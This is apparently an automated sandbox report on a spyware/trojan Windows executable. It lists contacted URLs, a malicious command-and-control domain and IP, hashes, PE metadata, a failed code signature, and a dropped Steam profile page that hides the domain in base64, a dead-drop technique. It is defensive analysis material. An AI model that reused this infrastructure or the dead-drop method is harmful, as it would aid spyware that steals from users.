                                                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://llal.xyz0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://store.steampowered.com/;0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://download.cdn.yandex.net/browser/win7/0x001900000002ab40-59.exefalse
                                                                unknown
                                                                https://store.steampowered.com/about/76561199619938930[1].htm.1.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://steamcommunity.com/my/wishlist/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                  unknown
                                                                  https://llal.xyz/D0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=49iUccgO0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                      unknown
                                                                      https://community.akamai.steamstatic.com/public/c0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://help.steampowered.com/en/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://steamcommunity.com/market/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                            unknown
                                                                            https://store.steampowered.com/news/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://community.akamai.steamstatic.com/0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://llal.xyz/Up/bk0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOITg3&a0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                                  unknown
                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://store.steampowered.com/subscriber_agreement/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                                    unknown
                                                                                    https://llal.xyz/Upx0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
https://recaptcha.net/recaptcha/; | 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.dr | false | URL Reputation: safe | unknown
https://llal.xyz// | 0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://api.browser.yandex.net/configs/all_zipbrandID=&partnerID=?Failed | 0x001900000002ab40-59.exe | false | | unknown
https://download.cdn.yandex.net/browser/installer/ybLocal | 0x001900000002ab40-59.exe | false | | unknown
https://llal.xyz/Up/bZ | 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://steamcommunity.com/discussions/ | 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.dr | false | | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/mo | 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.97.3 | llal.xyz | European Union | | 13335 | CLOUDFLARENETUS | true
104.102.42.29 | steamcommunity.com | United States | | 16625 | AKAMAI-ASUS | false
                                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                                  Analysis ID:1450268
                                                                                                  Start date and time:2024-06-01 17:40:23 +02:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 5m 53s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:6
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:0x001900000002ab40-59.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal88.troj.spyw.winEXE@1/2@2/2
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 86%
                                                                                                  • Number of executed functions: 21
                                                                                                  • Number of non-executed functions: 222
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                      No context
                                                                                                                      Process:C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      File Type:ASCII text, with very long lines (48844), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):48844
                                                                                                                      Entropy (8bit):5.374852585488459
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:vzsNZzFhOnDMIf19+kXSV0brSxnb22fnc6KWWhv6GYcnaxqLj3pd96B3hgFOQ9mE:v0zPO9f1ouYgcq331UaFOQCiunnT7KTp
                                                                                                                      MD5:4FE2F731AD372C0C62F7B574433704C6
                                                                                                                      SHA1:20DCF791FBD43C2E231D9CEBF1F2ECE001917BD5
                                                                                                                      SHA-256:C2CF6CF3503346442004B05207DD6854F21ED207040AAC133818D6AD7C704658
                                                                                                                      SHA-512:4A0CB373DC6594B3B01AFD24A35EB7599FD2BF8482B2464E54DA7115E163482AADD6B0B4169E3C4706CF98043363B9E96BAB0B0C019B0A522F9A3CC480A90CC7
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Process:C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2989), with CRLF, LF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34764
                                                                                                                      Entropy (8bit):5.382752455633575
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Hdpqm+0Ih3YAA9CWGO4fcDAvPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2A:Hd8m+0Ih3YAA9CWGO4FvPzzgiJmDzJt3
                                                                                                                      MD5:94CEEC911E1A763E1D375F9F8232F09F
                                                                                                                      SHA1:16B337A272C2437E54C01432736755A65B61DC6F
                                                                                                                      SHA-256:1E152B12BF7FDC7A2734F0E4D6E9A7E535D218EF1E7E0EFEC1CD5DF818046B32
                                                                                                                      SHA-512:F2473AE8D96DA7B743942100A5FB27C3561BFB1CF3E1BB285C834C9BFA9C7B52CDD294212E537944F0B8C97433032804EFA06AE11A0EB11ECA85D21A92181720
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: 3e3 bGxhbC54eXo=4e4</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=MO4-iGQJS3Kg&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.743554920865929
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:0x001900000002ab40-59.exe
                                                                                                                      File size:10'445'744 bytes
                                                                                                                      MD5:889cc88bca04e05c46d9e74636baee19
                                                                                                                      SHA1:28a273447716b7dea5526a499b801d025ac3ea6e
                                                                                                                      SHA256:00aac20f7fa77d5b959244157aad331bcdd28e3c4240e4a7106848625824fa78
                                                                                                                      SHA512:ceb3898654d7ead883bf69ea2deadc8e16d3c57d587c20a95657f244845a79e9de252407009f189b793d190defa880af876e0cf5700bb4c033fc4f83ee1b440c
                                                                                                                      SSDEEP:196608:X+SSJ7PbDdh0HtQba8z1sjzkAilU4I4pq:X+5J7PbDjOQba8psjzyz
                                                                                                                      TLSH:37B6D025FBD79301EB272638157C7D7B07217AC41AF846CB92626C881975BE24833F6E
                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...gROf..........".................P.............@..........................P............@.............................W.......<..
                                                                                                                      Icon Hash:57d9d3068c4c6d17
                                                                                                                      Entrypoint:0x4e1250
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x664F5267 [Thu May 23 14:27:51 2024 UTC]
                                                                                                                      TLS Callbacks:0x4b10f0, 0x4e0140, 0x4d0630, 0x4dfd90, 0x4535f0, 0x4d6890
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:14c3b6ff09b7337bfc60a8e85aa19d2b
                                                                                                                      Signature Valid:false
                                                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                      Error Number:-2146869232
                                                                                                                      Not Before, Not After
                                                                                                                      • 20/03/2024 15:23:35 21/03/2026 15:23:35
                                                                                                                      Subject Chain
                                                                                                                      • CN=YANDEX LLC, O=YANDEX LLC, STREET="Lev Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:9906E73CDAF5570B04FDE09A4BCB74A9
                                                                                                                      Thumbprint SHA-1:46E2F09D295573BB09DACC6B209B142C244A30D6
                                                                                                                      Thumbprint SHA-256:6E4B1A3C72EF08F8311CF4F596DE8CCA679D06C51A87E1C5714F8DECB84BCB37
                                                                                                                      Serial:6F126C9CC287DE458CE890F6
                                                                                                                      Instruction
                                                                                                                      call 00007FBDACB29CCAh
                                                                                                                      jmp 00007FBDACB29B3Dh
                                                                                                                      mov ecx, dword ptr [00540010h]
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      mov edi, BB40E64Eh
                                                                                                                      mov esi, FFFF0000h
                                                                                                                      cmp ecx, edi
                                                                                                                      je 00007FBDACB29CC6h
                                                                                                                      test esi, ecx
                                                                                                                      jne 00007FBDACB29CE8h
                                                                                                                      call 00007FBDACB29CF1h
                                                                                                                      mov ecx, eax
                                                                                                                      cmp ecx, edi
                                                                                                                      jne 00007FBDACB29CC9h
                                                                                                                      mov ecx, BB40E64Fh
                                                                                                                      jmp 00007FBDACB29CD0h
                                                                                                                      test esi, ecx
                                                                                                                      jne 00007FBDACB29CCCh
                                                                                                                      or eax, 00004711h
                                                                                                                      shl eax, 10h
                                                                                                                      or ecx, eax
                                                                                                                      mov dword ptr [00540010h], ecx
                                                                                                                      not ecx
                                                                                                                      pop edi
                                                                                                                      mov dword ptr [00540014h], ecx
                                                                                                                      pop esi
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 14h
                                                                                                                      and dword ptr [ebp-0Ch], 00000000h
                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                      and dword ptr [ebp-08h], 00000000h
                                                                                                                      push eax
                                                                                                                      call dword ptr [0053BF6Ch]
                                                                                                                      mov eax, dword ptr [ebp-08h]
                                                                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                      call dword ptr [0053BEE0h]
                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                      call dword ptr [0053BED8h]
                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                      lea eax, dword ptr [ebp-14h]
                                                                                                                      push eax
                                                                                                                      call dword ptr [0053C03Ch]
                                                                                                                      mov eax, dword ptr [ebp-10h]
                                                                                                                      lea ecx, dword ptr [ebp-04h]
                                                                                                                      xor eax, dword ptr [ebp-14h]
                                                                                                                      xor eax, dword ptr [ebp-04h]
                                                                                                                      xor eax, ecx
                                                                                                                      leave
                                                                                                                      ret
                                                                                                                      mov eax, 00004000h
                                                                                                                      ret
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      mov al, 01h
                                                                                                                      ret
                                                                                                                      push 00030000h
                                                                                                                      push 00010000h
                                                                                                                      push 00000000h
                                                                                                                      call 00007FBDACB3A7CAh
                                                                                                                      add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x13ba8b | 0x57 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13bae2 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x157000 | 0x83f490 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9f0200 | 0x61b0 | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x997000 | 0xb4dc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x138d6c | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x138cc0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x113220 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x13be28 | 0x308 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x13a424 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1116bf | 0x111800 | 1ede1476ef3d330e913bc3f3bad41adb | False | 0.5134942370315356 | data | 6.7672182256347195 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x113000 | 0x2c8fc | 0x2ca00 | eb08174cca2ce5dc4ff957e8244052fa | False | 0.4339548319327731 | data | 5.706910771292372 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x140000 | 0x13f68 | 0x3c00 | 549b9ba7bb8ee6d2b19e29f27a3f2d2e | False | 0.14459635416666666 | data | 3.719138123449055 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x154000 | 0xb9 | 0x200 | 9d97d87a24a59708eda3979804b492fc | False | 0.048828125 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
SHARED | 0x155000 | 0x4 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Shared | 0x156000 | 0xed4 | 0x1000 | 620f0b67a91f7f74151bc5be745b7110 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x157000 | 0x83f490 | 0x83f600 | 475b272ba34b20100e9eb1b74ca114d4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x997000 | 0x6d600 | 0x6d600 | d29c5b3ef78f9da59ae385c1ae6cba37 | False | 0.9119285714285714 | data | 7.972070171786351 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
BIN | 0x159578 | 0x120d7d | ASCII text, with very long lines (65434) |  |  | 0.1616525650024414
BIN | 0x27a2f8 | 0x28b69 | JSON data |  |  | 0.7573113617692386
BIN | 0x2a2e64 | 0x244 | XML 1.0 document, ASCII text |  |  | 0.41379310344827586
BIN | 0x2a30a8 | 0x968 | Microsoft Cabinet archive data, 2408 bytes, 1 file, at 0x2c +A "brand_config", number 1, 1 datablock, 0x1 compression |  |  | 1.0045681063122924
RT_ICON | 0x2a3a10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m |  |  | 0.6551418439716312
RT_ICON | 0x2a3e78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m |  |  | 0.4160412757973734
RT_ICON | 0x2a4f20 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m |  |  | 0.2991701244813278
RT_ICON | 0x2a74c8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m |  |  | 0.2438001889466226
RT_ICON | 0x2ab6f0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m |  |  | 0.1455548326038093
RT_ICON | 0x2bbf18 | 0x4dfb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9968441616991434
RT_DIALOG | 0x2c0d14 | 0xe6 | data |  |  | 0.34782608695652173
RT_DIALOG | 0x2c0dfc | 0x1de | data |  |  | 0.3075313807531381
RT_STRING | 0x2c0fdc | 0x19c | data | Chinese | Taiwan | 0.7038834951456311
RT_STRING | 0x2c1178 | 0x410 | data | Czech | Czech Republic | 0.40384615384615385
RT_STRING | 0x2c1588 | 0x488 | data | German | Germany | 0.3612068965517241
RT_STRING | 0x2c1a10 | 0x408 | data | English | United States | 0.38856589147286824
RT_STRING | 0x2c1e18 | 0x4de | data | French | France | 0.3434991974317817
RT_STRING | 0x2c22f8 | 0x434 | data | Italian | Italy | 0.35315985130111527
RT_STRING | 0x2c272c | 0x260 | data | Japanese | Japan | 0.5970394736842105
RT_STRING | 0x2c298c | 0x43a | data | Portuguese | Brazil | 0.3678373382624769
RT_STRING | 0x2c2dc8 | 0x39a | data | Russian | Russia | 0.4164859002169197
RT_STRING | 0x2c3164 | 0x3fa | data | Turkish | Turkey | 0.3929273084479371
RT_STRING | 0x2c3560 | 0x3cc | data | Ukrainian | Ukrain | 0.4269547325102881
RT_STRING | 0x2c392c | 0x3f8 | data | Kazakh | Kazakhstan | 0.40255905511811024
RT_STRING | 0x2c3d24 | 0x3fa | data | Uzbek | Italy | 0.3889980353634578
RT_STRING | 0x2c4120 | 0x19c | data | Chinese | China | 0.6771844660194175
RT_STRING | 0x2c42bc | 0x446 | data | Portuguese | Portugal | 0.376599634369287
RT_STRING | 0x2c4704 | 0x458 | data |  |  | 0.37050359712230213
RT_STRING | 0x2c4b5c | 0x126 | data | Chinese | Taiwan | 0.8707482993197279
